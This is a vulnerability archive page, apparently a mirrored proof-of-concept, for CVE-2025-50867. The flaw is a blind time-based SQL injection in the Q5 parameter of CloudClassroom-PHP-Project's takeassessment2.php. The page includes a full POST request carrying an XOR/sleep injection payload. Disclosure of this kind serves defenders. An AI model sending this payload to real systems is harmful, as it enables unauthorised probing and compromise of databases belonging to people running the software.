Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-50867 PoC — CloudClassroom-PHP-Project 安全漏洞

Source
Associated Vulnerability
Title:CloudClassroom-PHP-Project 安全漏洞 (CVE-2025-50867)
Description:A SQL Injection vulnerability exists in the takeassessment2.php endpoint of the CloudClassroom-PHP-Project 1.0, where the Q5 POST parameter is directly embedded in SQL statements without sanitization.
Description
SQL Injection
Readme
A SQL Injection vulnerability exists in the takeassessment2.php
endpoint of the CloudClassroom-PHP-Project 1.0, where the Q5 POST
parameter is directly embedded in SQL statements without sanitization.

------------------------------------------

Vulnerability Type : 

SQL Injection

------------------------------------------

Vendor of Product : 

https://github.com/mathurvishal/CloudClassroom-PHP-Project

------------------------------------------

Affected Product Code Base : 

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0

------------------------------------------

Affected Component : 

takeassessment2.php, Q5 POST parameter, SQL query logic

------------------------------------------

Attack Type : 
Remote
------------------------------------------

Attack Vectors : 

To exploit this vulnerability, an attacker submits a malicious POST request to /CloudClassroom-PHP-Project-master/takeassessment2.php with a payload in the Q5 parameter that causes a time delay in SQL processing (blind time-based SQLi).

POST Request:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done=
This causes a 6-second delay in the response, confirming the vulnerability.

------------------------------------------

Reference : 

https://owasp.org/www-community/attacks/SQL_Injection

------------------------------------------

Discoverer : 
saurabh solanki

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/
File Snapshot

[4.0K] /data/pocs/fc6efe3010a77207400b24c2ebc63c2ff2e3307a ├── [1.6K] README.md └── [1.6K] SQL Injection 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →